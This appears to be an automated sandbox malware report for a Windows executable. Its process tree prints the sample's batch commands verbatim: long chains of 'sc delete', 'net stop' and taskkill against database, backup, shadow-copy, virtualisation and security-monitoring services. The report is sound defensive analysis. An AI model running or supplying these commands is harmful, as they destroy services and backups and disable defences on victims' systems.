539819840ab5f00373a1885399025e8b93a1f4f0b73d9f0397cdc7ac2560a459

Analysis

max time kernel
1s
max time network
132s
platform
windows7_x64
resource
win7v20201028
submitted
18/01/2021, 07:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a428d05597237222448861e1186eb336.exe
Size

159KB
MD5

a428d05597237222448861e1186eb336
SHA1

0cc3468d41adcd92f5369d126ec8b7aaed5e5888
SHA256

539819840ab5f00373a1885399025e8b93a1f4f0b73d9f0397cdc7ac2560a459
SHA512

c2cef13da96dfd38a535b49d60036e17f44edac7581c519ca73412a832be865ea23c50f651ecb967eba316da7b451db3b2715ea80fdbb7155af6e59626780c73

Score

8^/10

evasion

Malware Config

Signatures

Modifies service settings 1 TTPs
Alters the configuration of existing services.
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Kills process with taskkill 64 IoCs

evasion

pid	Process
1220	taskkill.exe
1768	taskkill.exe
524	taskkill.exe
1612	taskkill.exe
1588	taskkill.exe
556	taskkill.exe
436	taskkill.exe
1636	taskkill.exe
1076	taskkill.exe
1928	taskkill.exe
956	taskkill.exe
1816	taskkill.exe
1924	taskkill.exe
964	taskkill.exe
1580	taskkill.exe
1736	taskkill.exe
960	taskkill.exe
436	taskkill.exe
556	taskkill.exe
1592	taskkill.exe
1828	taskkill.exe
1860	taskkill.exe
1600	taskkill.exe
1604	taskkill.exe
1928	taskkill.exe
280	taskkill.exe
1684	taskkill.exe
1792	taskkill.exe
1556	taskkill.exe
1684	taskkill.exe
1208	taskkill.exe
1632	taskkill.exe
804	taskkill.exe
1460	taskkill.exe
804	taskkill.exe
564	taskkill.exe
1084	taskkill.exe
1688	taskkill.exe
1460	taskkill.exe
696	taskkill.exe
1592	taskkill.exe
1632	taskkill.exe
976	taskkill.exe
1828	taskkill.exe
960	taskkill.exe
1352	taskkill.exe
1764	taskkill.exe
1860	taskkill.exe
1636	taskkill.exe
1548	taskkill.exe
1888	taskkill.exe
564	taskkill.exe
1596	taskkill.exe
928	taskkill.exe
1996	taskkill.exe
1580	taskkill.exe
1084	taskkill.exe
1504	taskkill.exe
1816	taskkill.exe
1580	taskkill.exe
976	taskkill.exe
564	taskkill.exe
1092	taskkill.exe
952	taskkill.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1220	taskkill.exe
Token: SeDebugPrivilege	564	taskkill.exe
Token: SeDebugPrivilege	1860	net1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1732 wrote to memory of 2032	1732	a428d05597237222448861e1186eb336.exe	54
PID 1732 wrote to memory of 2032	1732	a428d05597237222448861e1186eb336.exe	54
PID 1732 wrote to memory of 2032	1732	a428d05597237222448861e1186eb336.exe	54
PID 2032 wrote to memory of 1968	2032	cmd.exe	52
PID 2032 wrote to memory of 1968	2032	cmd.exe	52
PID 2032 wrote to memory of 1968	2032	cmd.exe	52
PID 2032 wrote to memory of 2008	2032	cmd.exe	50
PID 2032 wrote to memory of 2008	2032	cmd.exe	50
PID 2032 wrote to memory of 2008	2032	cmd.exe	50
PID 2032 wrote to memory of 1736	2032	cmd.exe	46
PID 2032 wrote to memory of 1736	2032	cmd.exe	46
PID 2032 wrote to memory of 1736	2032	cmd.exe	46
PID 2032 wrote to memory of 1772	2032	cmd.exe	45
PID 2032 wrote to memory of 1772	2032	cmd.exe	45
PID 2032 wrote to memory of 1772	2032	cmd.exe	45
PID 1968 wrote to memory of 1720	1968	cmd.exe	125
PID 1968 wrote to memory of 1720	1968	cmd.exe	125
PID 1968 wrote to memory of 1720	1968	cmd.exe	125
PID 2032 wrote to memory of 1760	2032	cmd.exe	42
PID 2032 wrote to memory of 1760	2032	cmd.exe	42
PID 2032 wrote to memory of 1760	2032	cmd.exe	42
PID 2008 wrote to memory of 1220	2008	cmd.exe	40
PID 2008 wrote to memory of 1220	2008	cmd.exe	40
PID 2008 wrote to memory of 1220	2008	cmd.exe	40
PID 2032 wrote to memory of 1068	2032	cmd.exe	38
PID 2032 wrote to memory of 1068	2032	cmd.exe	38
PID 2032 wrote to memory of 1068	2032	cmd.exe	38
PID 1720 wrote to memory of 628	1720	net1.exe	37
PID 1720 wrote to memory of 628	1720	net1.exe	37
PID 1720 wrote to memory of 628	1720	net1.exe	37
PID 2032 wrote to memory of 1224	2032	cmd.exe	25
PID 2032 wrote to memory of 1224	2032	cmd.exe	25
PID 2032 wrote to memory of 1224	2032	cmd.exe	25
PID 2032 wrote to memory of 1708	2032	cmd.exe	325
PID 2032 wrote to memory of 1708	2032	cmd.exe	325
PID 2032 wrote to memory of 1708	2032	cmd.exe	325
PID 1968 wrote to memory of 996	1968	cmd.exe	307
PID 1968 wrote to memory of 996	1968	cmd.exe	356
PID 1968 wrote to memory of 996	1968	cmd.exe	356
PID 1968 wrote to memory of 568	1968	cmd.exe	276
PID 1968 wrote to memory of 568	1968	cmd.exe	276
PID 1968 wrote to memory of 568	1968	cmd.exe	276
PID 2032 wrote to memory of 592	2032	cmd.exe	181
PID 2032 wrote to memory of 592	2032	cmd.exe	181
PID 2032 wrote to memory of 592	2032	cmd.exe	181
PID 568 wrote to memory of 776	568	sc.exe	249
PID 568 wrote to memory of 776	568	sc.exe	249
PID 568 wrote to memory of 776	568	sc.exe	249
PID 2032 wrote to memory of 1524	2032	cmd.exe	29
PID 2032 wrote to memory of 1524	2032	cmd.exe	29
PID 2032 wrote to memory of 1524	2032	cmd.exe	29
PID 1736 wrote to memory of 1028	1736	cmd.exe	362
PID 1736 wrote to memory of 1028	1736	cmd.exe	362
PID 1736 wrote to memory of 1028	1736	cmd.exe	362
PID 1028 wrote to memory of 1116	1028	net1.exe	287
PID 1028 wrote to memory of 1116	1028	net1.exe	287
PID 1028 wrote to memory of 1116	1028	net1.exe	287
PID 1760 wrote to memory of 564	1760	cmd.exe	374
PID 1760 wrote to memory of 564	1760	cmd.exe	374
PID 1760 wrote to memory of 564	1760	cmd.exe	374
PID 1772 wrote to memory of 1860	1772	cmd.exe	371
PID 1772 wrote to memory of 1860	1772	cmd.exe	371
PID 1772 wrote to memory of 1860	1772	cmd.exe	371
PID 1968 wrote to memory of 1648	1968	cmd.exe	58

C:\Users\Admin\AppData\Local\Temp\a428d05597237222448861e1186eb336.exe
"C:\Users\Admin\AppData\Local\Temp\a428d05597237222448861e1186eb336.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1732
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1B0F.tmp\1B20.tmp\1B21.bat C:\Users\Admin\AppData\Local\Temp\a428d05597237222448861e1186eb336.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2032
- - C:\Windows\system32\cmd.exe
    cmd /c "color b & @taskkill /IM ReportingServicesService.exe /F & @sc delete "SQL Server Reporting Services" & @sc delete MSSQLFDLauncher & @taskkill /IM U8CEServer.exe /F & @taskkill /IM ServerNT.exe /F & @net stop UFNet & @taskkill /IM MessageNotification.exe /F & @taskkill /IM cbVSCService11.exe /F & @taskkill /IM cbService.exe /F & @sc delete cbVSCService11 & @sc delete CobianBackup11"
    3⤵
    PID:752

C:\Windows\system32\cmd.exe
cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
1⤵
PID:1224
- C:\Windows\system32\sc.exe
  sc delete "eCard-TTransServer"
  2⤵
  PID:996
- C:\Windows\system32\sc.exe
  sc delete "DAService_TCP"
  2⤵
  PID:1768
- C:\Windows\system32\sc.exe
  sc delete eCardMPService
  2⤵
  PID:1784
- C:\Windows\system32\sc.exe
  sc delete EnergyDataService
  2⤵
  PID:396

C:\Windows\system32\cmd.exe
cmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"
1⤵
PID:592
- C:\Windows\system32\sc.exe
  sc delete ftnlsv3
  2⤵
  PID:1100
- C:\Windows\system32\sc.exe
  sc delete "UWS LoPriv Services"
  2⤵
  PID:1688
- C:\Windows\system32\sc.exe
  sc delete "ZTE FileTranS"
  2⤵
  PID:1200
- C:\Windows\system32\sc.exe
  sc delete ZTEVdservice
  2⤵
  PID:1688
- C:\Windows\system32\sc.exe
  sc delete kbasesrv
  2⤵
  PID:276
- C:\Windows\system32\sc.exe
  sc delete OracleJobSchedulerORCL
  2⤵
  PID:308
- C:\Windows\system32\sc.exe
  sc delete MMRHookService
  2⤵
  PID:1028
- C:\Windows\system32\sc.exe
  sc delete IpOverUsbSvc
  2⤵
  PID:996
- C:\Windows\system32\sc.exe
  sc delete MsDtsServer100
  2⤵
  PID:688
- C:\Windows\system32\sc.exe
  sc delete KuaiYunTools
  2⤵
  PID:568
- C:\Windows\system32\sc.exe
  sc delete KMSELDI
  2⤵
  PID:1236
- C:\Windows\system32\sc.exe
  sc delete btPanel
  2⤵
  PID:928
- C:\Windows\system32\sc.exe
  sc delete vmware-converter-server
  2⤵
  PID:820
- C:\Windows\system32\sc.exe
  sc delete GPSDaemon
  2⤵
  PID:1708
- C:\Windows\system32\sc.exe
  sc delete GPSUserSvr
  2⤵
  PID:1348
- C:\Windows\system32\sc.exe
  sc delete GPSDownSvr
  2⤵
  PID:1624
- C:\Windows\system32\sc.exe
  sc delete BackupExecRPCService
  2⤵
  PID:1692
- C:\Windows\system32\sc.exe
  sc delete BackupExecAgentBrowser
  2⤵
  PID:1724
- C:\Windows\system32\sc.exe
  sc delete BackupExecJobEngine
  2⤵
  PID:1600
- C:\Windows\system32\sc.exe
  sc delete TxQBService
  2⤵
  PID:1404
- C:\Windows\system32\sc.exe
  sc delete YunService
  2⤵
  PID:1724
- C:\Windows\system32\sc.exe
  sc delete Serv-U
  2⤵
  PID:2000
- C:\Windows\system32\sc.exe
  sc delete "EasyFZS Server"
  2⤵
  PID:920
- C:\Windows\system32\sc.exe
  sc delete OpenFastAssist
  2⤵
  PID:776
- C:\Windows\system32\sc.exe
  sc delete "Nuo Update Monitor"
  2⤵
  PID:1692
- C:\Windows\system32\sc.exe
  sc delete OfficeUpdateService
  2⤵
  PID:1460
- C:\Windows\system32\sc.exe
  sc delete RtcSrv
  2⤵
  PID:1236
- C:\Windows\system32\sc.exe
  sc delete RTCASMCU
  2⤵
  PID:1704
- C:\Windows\system32\sc.exe
  sc delete NscAuthService
  2⤵
  PID:776
- C:\Windows\system32\sc.exe
  sc delete MSCRMUnzipService
  2⤵
  PID:1724
- C:\Windows\system32\sc.exe
  sc delete MSCRMAsyncService$maintenance
  2⤵
  PID:1216

C:\Windows\system32\net.exe
net stop "SQL Server (MSSQLSERVER)"
1⤵
PID:568
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "SQL Server (MSSQLSERVER)"
  2⤵
  PID:776

C:\Windows\system32\cmd.exe
cmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""
1⤵
PID:1524
- C:\Windows\system32\sc.exe
  sc delete REPLICA
  2⤵
  PID:1616
- C:\Windows\system32\sc.exe
  sc delete MSCRMAsyncService
  2⤵
  PID:1236
- C:\Windows\system32\sc.exe
  sc delete RtcQms
  2⤵
  PID:1984
- C:\Windows\system32\sc.exe
  sc delete RTCDATAMCU
  2⤵
  PID:1548
- C:\Windows\system32\sc.exe
  sc delete SPAdminV4
  2⤵
  PID:776
- C:\Windows\system32\sc.exe
  sc delete SPSearchHostController
  2⤵
  PID:928
- C:\Windows\system32\sc.exe
  sc delete SPTimerV4
  2⤵
  PID:1600
- C:\Windows\system32\sc.exe
  sc delete SPTraceV4
  2⤵
  PID:920
- C:\Windows\system32\sc.exe
  sc delete ProjectQueueService16
  2⤵
  PID:1100
- C:\Windows\system32\sc.exe
  sc delete OSearch16
  2⤵
  PID:776
- C:\Windows\system32\sc.exe
  sc delete ProjectCalcService16
  2⤵
  PID:2016
- C:\Windows\system32\sc.exe
  sc delete c2wts
  2⤵
  PID:1716
- C:\Windows\system32\sc.exe
  sc delete MotionBoardRCService57
  2⤵
  PID:1628
- C:\Windows\system32\sc.exe
  sc delete vsvnjobsvc
  2⤵
  PID:276
- C:\Windows\system32\sc.exe
  sc delete SQLANYs_sem5
  2⤵
  PID:1236
- C:\Windows\system32\sc.exe
  sc delete SQLService
  2⤵
  PID:672
- C:\Windows\system32\sc.exe
  sc delete semwebsrv
  2⤵
  PID:2020
- C:\Windows\system32\sc.exe
  sc delete TbossSystem
  2⤵
  PID:2036
- C:\Windows\system32\sc.exe
  sc delete ErpEnvSvc
  2⤵
  PID:1568
- C:\Windows\system32\sc.exe
  sc delete Mysoft.Autoupgrade.UpdateService
  2⤵
  PID:1384
- C:\Windows\system32\sc.exe
  sc delete Mysoft.DataCenterService
  2⤵
  PID:1548
- C:\Windows\system32\sc.exe
  sc delete Mysoft.SchedulingService
  2⤵
  PID:556
- C:\Windows\system32\sc.exe
  sc delete MysoftUpdate
  2⤵
  PID:1568
- C:\Windows\system32\sc.exe
  sc delete edr_monitor
  2⤵
  PID:556
- C:\Windows\system32\sc.exe
  sc delete abs_deployer
  2⤵
  PID:2036
- C:\Windows\system32\sc.exe
  sc delete ShareBoxMonitorService
  2⤵
  PID:1604
- C:\Windows\system32\sc.exe
  sc delete ShareBoxService
  2⤵
  PID:1684
- C:\Windows\system32\sc.exe
  sc delete CloudExchangeService
  2⤵
  PID:1236
- C:\Windows\system32\sc.exe
  sc delete "U8WorkerService2"
  2⤵
  PID:1348
- C:\Windows\system32\sc.exe
  sc delete CIS
  2⤵
  PID:1704
- C:\Windows\system32\sc.exe
  sc delete EASService
  2⤵
  PID:1600
- C:\Windows\system32\sc.exe
  sc delete KICkSvr
  2⤵
  PID:592
- C:\Windows\system32\sc.exe
  sc delete "OSP Service"
  2⤵
  PID:1460
- C:\Windows\system32\sc.exe
  sc delete U8SmsSrv
  2⤵
  PID:1624
- C:\Windows\system32\sc.exe
  sc delete OfficeClearCache
  2⤵
  PID:1404
- C:\Windows\system32\sc.exe
  sc delete TurboCRM70
  2⤵
  PID:2000
- C:\Windows\system32\sc.exe
  sc delete U8DispatchService
  2⤵
  PID:1548
- C:\Windows\system32\sc.exe
  sc delete U8EISService
  2⤵
  PID:1724
- C:\Windows\system32\sc.exe
  sc delete U8EncryptService
  2⤵
  PID:1600
- C:\Windows\system32\sc.exe
  sc delete U8GCService
  2⤵
  PID:592
- - C:\Windows\system32\sc.exe
    sc delete MASTER
    3⤵
    PID:1708
  - - C:\Windows\system32\sc.exe
      sc delete allpass_redisservice_port21160
      4⤵
      PID:2044
  - - C:\Windows\system32\sc.exe
      sc delete ImeDictUpdateService
      4⤵
      PID:2000
  - - C:\Windows\system32\sc.exe
      sc delete MCService
      4⤵
      PID:268
  - - C:\Windows\system32\sc.exe
      sc delete XT800Service_Personal
      4⤵
      PID:1628
  - - C:\Windows\system32\sc.exe
      sc delete ImeDictUpdateService
      4⤵
      PID:1688
  - - C:\Windows\system32\sc.exe
      sc delete JhTask
      4⤵
      PID:1116
  - - C:\Windows\system32\sc.exe
      sc delete OracleVssWriterORCL
      4⤵
      PID:2036
  - - C:\Windows\system32\sc.exe
      sc delete aspnet_state @sc delete Redis
      4⤵
      PID:1376
- - C:\Windows\system32\sc.exe
    sc delete FTA
    3⤵
    PID:1600
- - C:\Windows\system32\sc.exe
    sc delete asComSvc
    3⤵
    PID:1780
- - C:\Windows\system32\sc.exe
    sc delete "Daemon Service"
    3⤵
    PID:1216
- - C:\Windows\system32\sc.exe
    sc delete "Rpc Monitor"
    3⤵
    PID:1404
- - C:\Windows\system32\sc.exe
    sc delete RemoteAssistService
    3⤵
    PID:1348
- - C:\Windows\system32\sc.exe
    sc delete Gailun_Downloader
    3⤵
    PID:1704
- - C:\Windows\system32\sc.exe
    sc delete MDM
    3⤵
    PID:1460
- - C:\Windows\system32\sc.exe
    sc delete BackupExecManagementService
    3⤵
    PID:688
- - C:\Windows\system32\sc.exe
    sc delete BackupExecDeviceMediaService
    3⤵
    PID:1476
- - C:\Windows\system32\sc.exe
    sc delete bedbg
    3⤵
    PID:1584
- - C:\Windows\system32\sc.exe
    sc delete BackupExecAgentAccelerator
    3⤵
    PID:472
- - C:\Windows\system32\sc.exe
    sc delete "Zabbix Agent"
    3⤵
    PID:920
- - C:\Windows\system32\sc.exe
    sc delete GPSFtpd
    3⤵
    PID:672
- - C:\Windows\system32\sc.exe
    sc delete GPSMysqld
    3⤵
    PID:1624
- - C:\Windows\system32\sc.exe
    sc delete GPSTomcat6
    3⤵
    PID:1568
- - C:\Windows\system32\sc.exe
    sc delete GPSLoginSvr
    3⤵
    PID:1476
- - C:\Windows\system32\sc.exe
    sc delete GPSMediaSvr
    3⤵
    PID:276
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop vss
      4⤵
      PID:1348
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SHOPCONTROL9"
        5⤵
        
        PID:1400
- - C:\Windows\system32\sc.exe
    sc delete GPSGatewaySvr
    3⤵
    PID:1376
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "NetBackup Legacy Client Service"
      4⤵
      PID:584
- - C:\Windows\system32\sc.exe
    sc delete GPSDataProcSvr
    3⤵
    PID:688
- - C:\Windows\system32\sc.exe
    sc delete GPSStorageSvr
    3⤵
    PID:1972
- - C:\Windows\system32\sc.exe
    sc delete OracleRemExecService
    3⤵
    PID:1100
- - C:\Windows\system32\sc.exe
    sc delete QQCertificateService
    3⤵
    PID:1216
- - C:\Windows\system32\sc.exe
    sc delete vmware-converter-worker
    3⤵
    PID:1624
- - C:\Windows\system32\sc.exe
    sc delete vmware-converter-agent
    3⤵
    PID:1684
- - C:\Windows\system32\sc.exe
    sc delete 2345PicSvc
    3⤵
    PID:1100
- - C:\Windows\system32\sc.exe
    sc delete Protect_2345Explorer
    3⤵
    PID:1596
- - C:\Windows\system32\sc.exe
    sc delete AlibabaProtect
    3⤵
    PID:1116
- - C:\Windows\system32\sc.exe
    sc delete qemu-ga
    3⤵
    PID:2036
- - C:\Windows\system32\sc.exe
    sc delete wwbizsrv
    3⤵
    PID:1312
- - C:\Windows\system32\sc.exe
    sc delete "ZTE USBIP Client"
    3⤵
    PID:2044
- - C:\Windows\system32\sc.exe
    sc delete "ZTE USBIP Client Guard"
    3⤵
    PID:1724
- - C:\Windows\system32\sc.exe
    sc delete ftusbrdsrv
    3⤵
    PID:1216
- - C:\Windows\system32\sc.exe
    sc delete ftusbrdwks
    3⤵
    PID:1200
- - C:\Windows\system32\sc.exe
    sc delete "UtilDev Web Server Pro"
    3⤵
    PID:2016
- - C:\Windows\system32\sc.exe
    sc delete FxService
    3⤵
    PID:996
- - C:\Windows\system32\sc.exe
    sc delete ftnlses3
    3⤵
    PID:1200
- C:\Windows\system32\sc.exe
  sc delete U8KeyManagePool
  2⤵
  PID:1460
- C:\Windows\system32\sc.exe
  sc delete "U8MPool"
  2⤵
  PID:1684
- C:\Windows\system32\sc.exe
  sc delete U8SCMPool
  2⤵
  PID:1236
- C:\Windows\system32\sc.exe
  sc delete U8SLReportService
  2⤵
  PID:1548
- C:\Windows\system32\sc.exe
  sc delete U8TaskService
  2⤵
  PID:1304
- C:\Windows\system32\sc.exe
  sc delete "U8WebPool"
  2⤵
  PID:920
- C:\Windows\system32\sc.exe
  sc delete UFAllNet
  2⤵
  PID:1604
- C:\Windows\system32\sc.exe
  sc delete UFReportService
  2⤵
  PID:556
- C:\Windows\system32\sc.exe
  sc delete UTUService
  2⤵
  PID:776
- C:\Windows\system32\sc.exe
  sc delete "U8WorkerService1"
  2⤵
  PID:1692
- C:\Windows\system32\sc.exe
  sc delete savsvc
  2⤵
  PID:1692
- C:\Windows\system32\sc.exe
  sc delete Mysoft.Setup.InstallService
  2⤵
  PID:1404
- C:\Windows\system32\sc.exe
  sc delete Mysoft.Config.WindowsService
  2⤵
  PID:1704
- C:\Windows\system32\sc.exe
  sc delete Mysoft.Autoupgrade.DispatchService
  2⤵
  PID:1752
- C:\Windows\system32\sc.exe
  sc delete CASLicenceServer
  2⤵
  PID:1752
- C:\Windows\system32\sc.exe
  sc delete CobianBackup10
  2⤵
  PID:1704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSERVERAGENT
    3⤵
    PID:972
- C:\Windows\system32\sc.exe
  sc delete RaAutoInstSrv_RT2870
  2⤵
  PID:584
- C:\Windows\system32\sc.exe
  sc delete MediatekRegistryWriter
  2⤵
  PID:776
- C:\Windows\system32\sc.exe
  sc delete LPManager
  2⤵
  PID:1684
- C:\Windows\system32\sc.exe
  sc delete BestSyncSvc
  2⤵
  PID:1604
- C:\Windows\system32\sc.exe
  sc delete "FlexNet Licensing Service 64"
  2⤵
  PID:568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VIM_SQLEXP
    3⤵
    PID:308
- C:\Windows\system32\sc.exe
  sc delete VisualSVNServer
  2⤵
  PID:1692
- C:\Windows\system32\sc.exe
  sc delete MotionBoard57
  2⤵
  PID:776
- C:\Windows\system32\sc.exe
  sc delete ADWS
  2⤵
  PID:1336
- C:\Windows\system32\sc.exe
  sc delete AppFabricCachingService
  2⤵
  PID:1312
- C:\Windows\system32\sc.exe
  sc delete ProjectEventService16
  2⤵
  PID:1768
- C:\Windows\system32\sc.exe
  sc delete RTCCDR
  2⤵
  PID:1624
- C:\Windows\system32\sc.exe
  sc delete RTCIMMCU
  2⤵
  PID:1716
- C:\Windows\system32\sc.exe
  sc delete RTCMEETINGMCU
  2⤵
  PID:1624
- C:\Windows\system32\sc.exe
  sc delete RTCAVMCU
  2⤵
  PID:1460
- C:\Windows\system32\sc.exe
  sc delete RTCATS
  2⤵
  PID:920

C:\Windows\system32\sc.exe
sc config MSSQLSERVER start=disabled
1⤵
PID:996

C:\Windows\system32\cmd.exe
cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"
1⤵
PID:1708
- C:\Windows\system32\sc.exe
  sc delete OracleOraDb11g_home1TNSListener
  2⤵
  PID:2016
- C:\Windows\system32\sc.exe
  sc delete OracleOraDb11g_home1ClrAgent
  2⤵
  PID:2000
- C:\Windows\system32\sc.exe
  sc delete OracleServiceORCL
  2⤵
  PID:1628
- C:\Windows\system32\sc.exe
  sc delete "Kiwi Syslog Server"
  2⤵
  PID:1568
- C:\Windows\system32\sc.exe
  sc delete "UWS HiPriv Services"
  2⤵
  PID:1236
- C:\Windows\system32\net.exe
  net stop MSSQL$FE_EXPRESS
  2⤵
  PID:1616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$FE_EXPRESS
    3⤵
    PID:524
- C:\Windows\system32\sc.exe
  sc delete "Flash Helper Service"
  2⤵
  PID:1796
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "ReportServer$SHOPCONTROL9"
    3⤵
    PID:1592

C:\Windows\system32\net.exe
net stop "MSOLAP$SHOPCONTROL9"
1⤵
PID:1028
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "MSOLAP$SHOPCONTROL9"
  2⤵
  PID:1116

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER
1⤵
PID:628

C:\Windows\system32\cmd.exe
cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
1⤵
PID:1068
- C:\Windows\system32\sc.exe
  sc delete SQLSERVERAGENT
  2⤵
  PID:1464
- C:\Windows\system32\sc.exe
  sc delete "XT800Service_Personal"
  2⤵
  PID:1376
- C:\Windows\system32\sc.exe
  sc delete SQLWriter
  2⤵
  PID:1168
- C:\Windows\system32\sc.exe
  sc delete MSSQLFDLauncher
